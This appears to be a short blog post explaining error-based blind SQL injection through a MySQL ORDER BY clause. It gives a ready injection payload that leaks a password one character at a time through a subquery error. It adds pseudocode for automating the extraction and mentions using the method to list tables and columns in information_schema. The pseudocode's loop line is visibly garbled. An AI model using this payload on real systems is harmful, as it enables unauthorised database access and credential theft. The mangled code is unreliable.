For example if we have the query: SELECT * FROM users ORDER BY username {injection}
We got raw access to this query by changing ASC or DESC into anything we want.
Injecting the following: ASC, IF (ASCII(SUBSTRING('password',1,1)) = 50,1,(SELECT 1 UNION SELECT 2)) LIMIT 1,1 --
There are two things that could happen... If the query executes normally you know that the first character of the password is 50 (ASCII value)
Please note that you do need only 1 record, if you have multiple or cannot escape the limit clause you might want to use a subquery instead of direct ASCII(SUSBSTRING()) method..
Anyway back to the query, if the character is incorrect the following message will appear if mysql_errors() are printed: Subquery returns more than 1 row
So basically you need to write an exploit that once a query has been executed properly it moves to the next character and remembers the previous character..
In pseudo code something like
function get() {
define charset
define emptypassword
define sql_injection_url_and_string
for i = 1 ; i < x =" 0;x">post(sql_injection_url_and_string)) {
// The query was succesful
emptypassword + charset(x); // the character that matched to the string
break; // move to the next position
}
}
}
print emptypassword;
}
I applied this method for finding table names and columns from the information_schema.tables and .columns...
This kind of SQL injection I enjoy the most. It's not as easy as the union select command.. It requires some thinking and writing an exploit..
No comments:
Post a Comment